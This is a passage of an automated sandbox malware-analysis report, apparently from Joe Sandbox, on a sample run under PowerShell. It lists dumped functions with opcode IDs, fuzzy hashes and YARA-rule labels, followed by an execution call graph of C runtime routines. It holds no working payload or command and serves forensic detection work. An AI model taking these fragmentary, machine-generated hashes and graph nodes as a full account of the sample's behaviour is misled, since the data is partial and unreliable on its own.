                                                                                                                • Instruction Fuzzy Hash: 9CF030602893C18FD326866489519A1BF31EF4361071DC1DFD5898F1D3CA559D4BD782
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D98518 Relevance: .0, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0132a85e188d82060d2dd51b7a03aa42271fde09d9ef4947b781b70a5f9275e9
                                                                                                                • Instruction ID: db90a75963c51c9e5db4f14c803497baa3349ad37fbfdd629e95f6a079895745
                                                                                                                • Opcode Fuzzy Hash: 0132a85e188d82060d2dd51b7a03aa42271fde09d9ef4947b781b70a5f9275e9
                                                                                                                • Instruction Fuzzy Hash: 59F09774E0020A8FCB80DF68D485AAEBBF5BF49214F5041A9E509DB321D730E945CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D9A758 Relevance: .0, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e5003e41c7fadbd7985d4151c23268d248943eac1b85183f069b9fa54b07a2fa
                                                                                                                • Instruction ID: 74c33fc69dfb28fefcaadd72f82302b357ac35c61086ffd7dba5f01877a18fb7
                                                                                                                • Opcode Fuzzy Hash: e5003e41c7fadbd7985d4151c23268d248943eac1b85183f069b9fa54b07a2fa
                                                                                                                • Instruction Fuzzy Hash: BCE092713406406BC349EB68E990EE977AADFC6350B0441B6E102DB65CCF65ED46C7E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 02D90FF3 Relevance: .2, Instructions: 173COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1e7b405b66ed038f3bb0f2953e778e4a6dc03316d6bf5e88e8d87c4fc506eccc
                                                                                                                • Instruction ID: ce2c92f496b87347f3ca37bd42c82cc8479633acc4acdd0fee6cc430cf61f9dc
                                                                                                                • Opcode Fuzzy Hash: 1e7b405b66ed038f3bb0f2953e778e4a6dc03316d6bf5e88e8d87c4fc506eccc
                                                                                                                • Instruction Fuzzy Hash: 4951F02240EBD66FC7078734887A494BFB0AD5316435F86DBC0D5CF6A3D71A991AC3A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D91044 Relevance: .1, Instructions: 135COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a6b7244d9d7d9b59209545b2a372e9c920a4ca9d7ea353ca7b5e09d7e387ca0f
                                                                                                                • Instruction ID: 6ebe0d95528f004e31177e35acf70a90f420527433ce6dc77ff1a2a8aae76bb4
                                                                                                                • Opcode Fuzzy Hash: a6b7244d9d7d9b59209545b2a372e9c920a4ca9d7ea353ca7b5e09d7e387ca0f
                                                                                                                • Instruction Fuzzy Hash: 8341E32140EBD66FC3078730886A4907FB0AD5316435E86DBC4E5CF6A3D71A991EC7A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D9A16C Relevance: .1, Instructions: 128COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: da89c99e50695763e57b133dbc1562bfa5e2a5eb5d2a632d7f37fdfc77d4ce14
                                                                                                                • Instruction ID: d8cd180f3637a49ebd744b0a90d5de04aadc0e20f8e81dac709f00d4f073453b
                                                                                                                • Opcode Fuzzy Hash: da89c99e50695763e57b133dbc1562bfa5e2a5eb5d2a632d7f37fdfc77d4ce14
                                                                                                                • Instruction Fuzzy Hash: 2B418FA240D7D19FDB429B3C98A53C53F60EF23644F5A81EBC0D18B0A3D95A890FC7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D916AD Relevance: .1, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6febc1ed73ce03cb58fd5b1d54cd7d62aee54bc30c64eaf64df28f53cdc24b65
                                                                                                                • Instruction ID: 3b884fb676630219cf659895d21d167362df90dafd94f482071a2ce78fbf8940
                                                                                                                • Opcode Fuzzy Hash: 6febc1ed73ce03cb58fd5b1d54cd7d62aee54bc30c64eaf64df28f53cdc24b65
                                                                                                                • Instruction Fuzzy Hash: E9313A2140EBC22FD3078734982A5947F70AE53564B9E86D7C0C5CF5E7D74A981EC3A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02D9166D Relevance: .1, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2765711091.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_2d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 80b6700401e7ced415aa8887c7a0586325686cc76051ab92d09aef1cf291677d
                                                                                                                • Instruction ID: 49288b7b5c395afc9a62c8869039e61fdbc0af784f1f61802720032a03e8f309
                                                                                                                • Opcode Fuzzy Hash: 80b6700401e7ced415aa8887c7a0586325686cc76051ab92d09aef1cf291677d
                                                                                                                • Instruction Fuzzy Hash: 0F314B2144EBC26FD3078738883A6943FB0AE53664B5E82D7C084CF5E7D749981EC3A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D5288 Relevance: 12.9, Strings: 10, Instructions: 396COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-267665775
                                                                                                                • Opcode ID: 5715656cd5b6642eedab43483d6122da0e2f958955897a781fb5fbe82589e8d1
                                                                                                                • Instruction ID: cbc1cd50f37ac66c3c1479a4c283b932bfbcef599e4a3a3efcc7da4c6dab02ff
                                                                                                                • Opcode Fuzzy Hash: 5715656cd5b6642eedab43483d6122da0e2f958955897a781fb5fbe82589e8d1
                                                                                                                • Instruction Fuzzy Hash: 7DC135B1B00216CFCB359E7D98506BABBE6BF81211F24847BD845CB250FA72CD51C7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D4CB8 Relevance: 12.8, Strings: 10, Instructions: 309COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-2309685269
                                                                                                                • Opcode ID: 5bb917eb73128a4f7d6f10fc4378eab721dad5d9be5b5f0957d7a17a9fa4ae42
                                                                                                                • Instruction ID: b967cea94c332f76cf952cb316318621d853121ae0af4744403cfca475ca85ed
                                                                                                                • Opcode Fuzzy Hash: 5bb917eb73128a4f7d6f10fc4378eab721dad5d9be5b5f0957d7a17a9fa4ae42
                                                                                                                • Instruction Fuzzy Hash: EAA12571B002469FDB389B6CC4506EABBA6FF85710F14846ADD058B354DB32DD52C7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D27E0 Relevance: 10.3, Strings: 8, Instructions: 326COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-1910532044
                                                                                                                • Opcode ID: 3bc24161285dfd359ea794f9bb292051e80e5415849193929fa103ce3f586c93
                                                                                                                • Instruction ID: d5c70df1d64605a720168e908fca901ca3bbabdf84bf32b3abdddc720166a2f9
                                                                                                                • Opcode Fuzzy Hash: 3bc24161285dfd359ea794f9bb292051e80e5415849193929fa103ce3f586c93
                                                                                                                • Instruction Fuzzy Hash: 7DB136717043558FDB358B6D88107A6BBE6FFC6621F2484ABD845CB392DA72CC81C7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D0638 Relevance: 7.8, Strings: 6, Instructions: 328COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-1480752206
                                                                                                                • Opcode ID: fc7bc5119439e6e7a0dfea417f150f4182f9e7dffc8c53c33a07750501ab855b
                                                                                                                • Instruction ID: 11c8726c2f996cdf8775e1557a12f966210b4b1f198e21054acc418e9e67383a
                                                                                                                • Opcode Fuzzy Hash: fc7bc5119439e6e7a0dfea417f150f4182f9e7dffc8c53c33a07750501ab855b
                                                                                                                • Instruction Fuzzy Hash: CDB1E3B1B04256CFDB248B6DD4506AABBE6FFD1315F24846BD80D8B291DB32CD41C7A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D4C9D Relevance: 6.4, Strings: 5, Instructions: 130COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$tP]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-2702571027
                                                                                                                • Opcode ID: bcb052276eb965de5650a6220de4f434147b65d9faa2346cc92b5fa50cc5f3fe
                                                                                                                • Instruction ID: 5e636f8325c4bd88a7f7edb826d4059494f75dc69fe8ad0cb92340d93f49372d
                                                                                                                • Opcode Fuzzy Hash: bcb052276eb965de5650a6220de4f434147b65d9faa2346cc92b5fa50cc5f3fe
                                                                                                                • Instruction Fuzzy Hash: 6D4103B1A04285EFDB749E1CC5907EABBA1FB89721F18C46BDC159B291C731DC41CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D5450 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$$]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-2705583504
                                                                                                                • Opcode ID: c05a73b36340ff3edad96a87a39d94b5f652a54e7d46d49f5754c738cc31a554
                                                                                                                • Instruction ID: 07841872c62e9d2bf246ac34b95e6b2362b66fb748edce7b0543556fc26da755
                                                                                                                • Opcode Fuzzy Hash: c05a73b36340ff3edad96a87a39d94b5f652a54e7d46d49f5754c738cc31a554
                                                                                                                • Instruction Fuzzy Hash: 62218EF5A20206DBDB368E1DC584AE577A6BF41662F694467F8098B150F731CCA0CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D6C98 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 84i$84i$tP]q$tP]q
                                                                                                                • API String ID: 0-1380357753
                                                                                                                • Opcode ID: 56fa25025cf0e05360983dc3f8042a2abbeab8d2937cf1e3658e5c97552150bb
                                                                                                                • Instruction ID: d7d3fd2e467dd7c246bcb65624e68cdfef97cd1453ca1d65b0b23d7bebefbdaf
                                                                                                                • Opcode Fuzzy Hash: 56fa25025cf0e05360983dc3f8042a2abbeab8d2937cf1e3658e5c97552150bb
                                                                                                                • Instruction Fuzzy Hash: A2317BB1A042659FC7315B6C98246E9BFE1EF46750F19849BD980DF392C6309C06C7E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D5738 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-858218434
                                                                                                                • Opcode ID: e4f0034c65335bd9a18df69a37f035e64edf365b99752a447bdf7cfd9779b47d
                                                                                                                • Instruction ID: ab9ef5b886baec536764ce3fafda8296b642ec6d3a8ee0b473d25f0361dc8305
                                                                                                                • Opcode Fuzzy Hash: e4f0034c65335bd9a18df69a37f035e64edf365b99752a447bdf7cfd9779b47d
                                                                                                                • Instruction Fuzzy Hash: FC3138717103129BEA38562D8960B7A77CAABC0A54F70883BEE41DF3C1ED66DD1183B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D0CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                • API String ID: 0-858218434
                                                                                                                • Opcode ID: 1de1a855853eb9d86f77a48f2ec0d7572b68a6ef4a12f51d93504df885e2085e
                                                                                                                • Instruction ID: 849a7c9a3c6ca48618ff11d60079b20dd560f6e82394b9d0446d412a5e5618d2
                                                                                                                • Opcode Fuzzy Hash: 1de1a855853eb9d86f77a48f2ec0d7572b68a6ef4a12f51d93504df885e2085e
                                                                                                                • Instruction Fuzzy Hash: C12136713003159BDB74662D9860777BBD5BBC0611F24882B990DCB3C1DD71DC418361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 075D1749 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.2809282197.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_75d0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                                                                • API String ID: 0-978391646
                                                                                                                • Opcode ID: 69f54171575a6e0725fc8b4a575004ffd166183e9d1a0a13ccd52a083ae6d2c1
                                                                                                                • Instruction ID: c6d821bb12f0b42443e04444ee2b427bb8652dd0df16d6942ae1aa6695eecd42
                                                                                                                • Opcode Fuzzy Hash: 69f54171575a6e0725fc8b4a575004ffd166183e9d1a0a13ccd52a083ae6d2c1
                                                                                                                • Instruction Fuzzy Hash: D901F232B097898FC33A423C28201B12FF69FC399032B04D3C481DF267CA294C0A83A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.6%
                                                                                                                Dynamic/Decrypted Code Coverage:99.7%
                                                                                                                Signature Coverage:3.5%
                                                                                                                Total number of Nodes:1591
                                                                                                                Total number of Limit Nodes:5
                                                                                                                execution_graph 7028 22c98a89 7029 22c96d60 51 API calls 7028->7029 7030 22c98a8e 7029->7030 7075 22c92049 7076 22c92055 ___scrt_is_nonwritable_in_current_image 7075->7076 7077 22c9207d 7076->7077 7078 22c920d3 7076->7078 7088 22c9205e 7076->7088 7089 22c9244c 7077->7089 7110 22c92639 IsProcessorFeaturePresent 7078->7110 7081 22c920da 7082 22c92082 7098 22c92308 7082->7098 7084 22c92087 __RTC_Initialize 7101 22c920c4 7084->7101 7086 22c9209f 7104 22c9260b 7086->7104 7090 22c92451 ___scrt_release_startup_lock 7089->7090 7091 22c92455 7090->7091 7095 22c92461 7090->7095 7092 22c9527a _abort 20 API calls 7091->7092 7093 22c9245f 7092->7093 7093->7082 7094 22c9246e 7094->7082 7095->7094 7096 22c9499b _abort 28 API calls 7095->7096 7097 22c94bbd 7096->7097 7097->7082 7114 22c934c7 RtlInterlockedFlushSList 7098->7114 7100 22c92312 7100->7084 7116 22c9246f 7101->7116 7103 22c920c9 ___scrt_release_startup_lock 7103->7086 7105 22c92617 7104->7105 7107 22c9262d 7105->7107 7144 22c953ed 7105->7144 7107->7088 7111 22c9264e ___scrt_fastfail 7110->7111 7112 22c926f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7111->7112 7113 22c92744 ___scrt_fastfail 7112->7113 7113->7081 7115 22c934d7 7114->7115 7115->7100 7121 22c953ff 7116->7121 7128 22c95c2b 7121->7128 7124 22c9391b 7125 22c9354d 7124->7125 7126 22c93925 7124->7126 7125->7103 7139 22c93b2c 7126->7139 7129 22c95c35 7128->7129 7131 22c92476 7128->7131 7132 22c95db2 7129->7132 7131->7124 7133 22c95c45 _abort 5 API calls 7132->7133 7134 22c95dd9 7133->7134 7135 22c95df1 TlsFree 7134->7135 7138 22c95de5 7134->7138 7135->7138 7136 22c92ada _ValidateLocalCookies 5 API calls 7137 22c95e02 7136->7137 7137->7131 7138->7136 7140 22c93a82 try_get_function 5 API calls 7139->7140 7141 22c93b46 7140->7141 7142 22c93b5e TlsFree 7141->7142 7143 22c93b52 7141->7143 7142->7143 7143->7125 7155 22c974da 7144->7155 7147 22c93529 7148 22c93532 7147->7148 7154 22c93543 7147->7154 7149 22c9391b ___vcrt_uninitialize_ptd 6 API calls 7148->7149 7150 22c93537 7149->7150 7159 22c93972 7150->7159 7154->7107 7157 22c974f3 7155->7157 7156 22c92ada _ValidateLocalCookies 5 API calls 7158 22c92625 7156->7158 7157->7156 7158->7147 7160 22c9353c 7159->7160 7161 22c9397d 7159->7161 7163 22c93c50 7160->7163 7162 22c93987 RtlDeleteCriticalSection 7161->7162 7162->7160 7162->7162 7164 22c93c59 7163->7164 7166 22c93c7f 7163->7166 7165 22c93c69 FreeLibrary 7164->7165 7164->7166 7165->7164 7166->7154 7552 22c95348 7553 22c93529 ___vcrt_uninitialize 8 API calls 7552->7553 7554 22c9534f 7553->7554 7555 22c97b48 7565 22c98ebf 7555->7565 7559 22c97b55 7578 22c9907c 7559->7578 7562 22c97b7f 7563 22c9571e _free 20 API calls 7562->7563 7564 22c97b8a 7563->7564 7582 22c98ec8 7565->7582 7567 22c97b50 7568 22c98fdc 7567->7568 7569 22c98fe8 ___scrt_is_nonwritable_in_current_image 7568->7569 7602 22c95671 RtlEnterCriticalSection 7569->7602 7571 22c9905e 7616 22c99073 7571->7616 7573 22c98ff3 7573->7571 7575 22c99032 RtlDeleteCriticalSection 7573->7575 7603 22c9a09c 7573->7603 7574 22c9906a _abort 7574->7559 7577 22c9571e _free 20 API calls 7575->7577 7577->7573 7579 22c99092 7578->7579 7580 22c97b64 RtlDeleteCriticalSection 7578->7580 7579->7580 7581 22c9571e _free 20 API calls 7579->7581 7580->7559 7580->7562 7581->7580 7583 22c98ed4 ___scrt_is_nonwritable_in_current_image 7582->7583 7592 22c95671 RtlEnterCriticalSection 7583->7592 7585 22c98f77 7597 22c98f97 7585->7597 7589 22c98f83 _abort 7589->7567 7590 22c98e78 66 API calls 7591 22c98ee3 7590->7591 7591->7585 7591->7590 7593 22c97b94 RtlEnterCriticalSection 7591->7593 7594 22c98f6d 7591->7594 7592->7591 7593->7591 7600 22c97ba8 RtlLeaveCriticalSection 7594->7600 7596 22c98f75 7596->7591 7601 22c956b9 RtlLeaveCriticalSection 7597->7601 7599 22c98f9e 7599->7589 7600->7596 7601->7599 7602->7573 7604 22c9a0a8 ___scrt_is_nonwritable_in_current_image 7603->7604 7605 22c9a0b9 7604->7605 7606 22c9a0ce 7604->7606 7607 22c96368 __dosmaperr 20 API calls 7605->7607 7615 22c9a0c9 _abort 7606->7615 7619 22c97b94 RtlEnterCriticalSection 7606->7619 7609 22c9a0be 7607->7609 7611 22c962ac _abort 26 API calls 7609->7611 7610 22c9a0ea 7620 22c9a026 7610->7620 7611->7615 7613 22c9a0f5 7636 22c9a112 7613->7636 7615->7573 7884 22c956b9 RtlLeaveCriticalSection 7616->7884 7618 22c9907a 7618->7574 7619->7610 7621 22c9a048 7620->7621 7622 22c9a033 7620->7622 7629 22c9a043 7621->7629 7639 22c98e12 7621->7639 7623 22c96368 __dosmaperr 20 API calls 7622->7623 7624 22c9a038 7623->7624 7626 22c962ac _abort 26 API calls 7624->7626 7626->7629 7628 22c9907c 20 API calls 7630 22c9a064 7628->7630 7629->7613 7645 22c97a5a 7630->7645 7632 22c9a06a 7652 22c9adce 7632->7652 7635 22c9571e _free 20 API calls 7635->7629 7883 22c97ba8 RtlLeaveCriticalSection 7636->7883 7638 22c9a11a 7638->7615 7640 22c98e2a 7639->7640 7644 22c98e26 7639->7644 7641 22c97a5a 26 API calls 7640->7641 7640->7644 7642 22c98e4a 7641->7642 7667 22c99a22 7642->7667 7644->7628 7646 22c97a7b 7645->7646 7647 22c97a66 7645->7647 7646->7632 7648 22c96368 __dosmaperr 20 API calls 7647->7648 7649 22c97a6b 7648->7649 7650 22c962ac _abort 26 API calls 7649->7650 7651 22c97a76 7650->7651 7651->7632 7653 22c9addd 7652->7653 7656 22c9adf2 7652->7656 7654 22c96355 __dosmaperr 20 API calls 7653->7654 7658 22c9ade2 7654->7658 7655 22c9ae2d 7657 22c96355 __dosmaperr 20 API calls 7655->7657 7656->7655 7659 22c9ae19 7656->7659 7660 22c9ae32 7657->7660 7661 22c96368 __dosmaperr 20 API calls 7658->7661 7840 22c9ada6 7659->7840 7663 22c96368 __dosmaperr 20 API calls 7660->7663 7664 22c9a070 7661->7664 7665 22c9ae3a 7663->7665 7664->7629 7664->7635 7666 22c962ac _abort 26 API calls 7665->7666 7666->7664 7668 22c99a2e ___scrt_is_nonwritable_in_current_image 7667->7668 7669 22c99a4e 7668->7669 7670 22c99a36 7668->7670 7672 22c99aec 7669->7672 7677 22c99a83 7669->7677 7692 22c96355 7670->7692 7674 22c96355 __dosmaperr 20 API calls 7672->7674 7676 22c99af1 7674->7676 7675 22c96368 __dosmaperr 20 API calls 7678 22c99a43 _abort 7675->7678 7679 22c96368 __dosmaperr 20 API calls 7676->7679 7695 22c98c7b RtlEnterCriticalSection 7677->7695 7678->7644 7681 22c99af9 7679->7681 7683 22c962ac _abort 26 API calls 7681->7683 7682 22c99a89 7684 22c99aba 7682->7684 7685 22c99aa5 7682->7685 7683->7678 7696 22c99b0d 7684->7696 7686 22c96368 __dosmaperr 20 API calls 7685->7686 7688 22c99aaa 7686->7688 7690 22c96355 __dosmaperr 20 API calls 7688->7690 7689 22c99ab5 7747 22c99ae4 7689->7747 7690->7689 7693 22c95b7a __dosmaperr 20 API calls 7692->7693 7694 22c9635a 7693->7694 7694->7675 7695->7682 7697 22c99b3b 7696->7697 7734 22c99b34 7696->7734 7698 22c99b3f 7697->7698 7699 22c99b5e 7697->7699 7700 22c96355 __dosmaperr 20 API calls 7698->7700 7703 22c99baf 7699->7703 7704 22c99b92 7699->7704 7702 22c99b44 7700->7702 7701 22c92ada _ValidateLocalCookies 5 API calls 7705 22c99d15 7701->7705 7706 22c96368 __dosmaperr 20 API calls 7702->7706 7707 22c99bc5 7703->7707 7750 22c9a00b 7703->7750 7708 22c96355 __dosmaperr 20 API calls 7704->7708 7705->7689 7710 22c99b4b 7706->7710 7753 22c996b2 7707->7753 7709 22c99b97 7708->7709 7713 22c96368 __dosmaperr 20 API calls 7709->7713 7714 22c962ac _abort 26 API calls 7710->7714 7716 22c99b9f 7713->7716 7714->7734 7719 22c962ac _abort 26 API calls 7716->7719 7717 22c99c0c 7720 22c99c20 7717->7720 7721 22c99c66 WriteFile 7717->7721 7718 22c99bd3 7722 22c99bf9 7718->7722 7723 22c99bd7 7718->7723 7719->7734 7726 22c99c28 7720->7726 7727 22c99c56 7720->7727 7724 22c99c89 GetLastError 7721->7724 7731 22c99bef 7721->7731 7765 22c99492 GetConsoleCP 7722->7765 7728 22c99ccd 7723->7728 7760 22c99645 7723->7760 7724->7731 7732 22c99c2d 7726->7732 7733 22c99c46 7726->7733 7791 22c99728 7727->7791 7728->7734 7735 22c96368 __dosmaperr 20 API calls 7728->7735 7731->7728 7731->7734 7738 22c99ca9 7731->7738 7732->7728 7776 22c99807 7732->7776 7783 22c998f5 7733->7783 7734->7701 7737 22c99cf2 7735->7737 7740 22c96355 __dosmaperr 20 API calls 7737->7740 7741 22c99cb0 7738->7741 7742 22c99cc4 7738->7742 7740->7734 7743 22c96368 __dosmaperr 20 API calls 7741->7743 7798 22c96332 7742->7798 7745 22c99cb5 7743->7745 7746 22c96355 __dosmaperr 20 API calls 7745->7746 7746->7734 7839 22c98c9e RtlLeaveCriticalSection 7747->7839 7749 22c99aea 7749->7678 7803 22c99f8d 7750->7803 7825 22c98dbc 7753->7825 7755 22c996c2 7756 22c996c7 7755->7756 7757 22c95af6 _abort 38 API calls 7755->7757 7756->7717 7756->7718 7758 22c996ea 7757->7758 7758->7756 7759 22c99708 GetConsoleMode 7758->7759 7759->7756 7761 22c9969f 7760->7761 7762 22c9966a 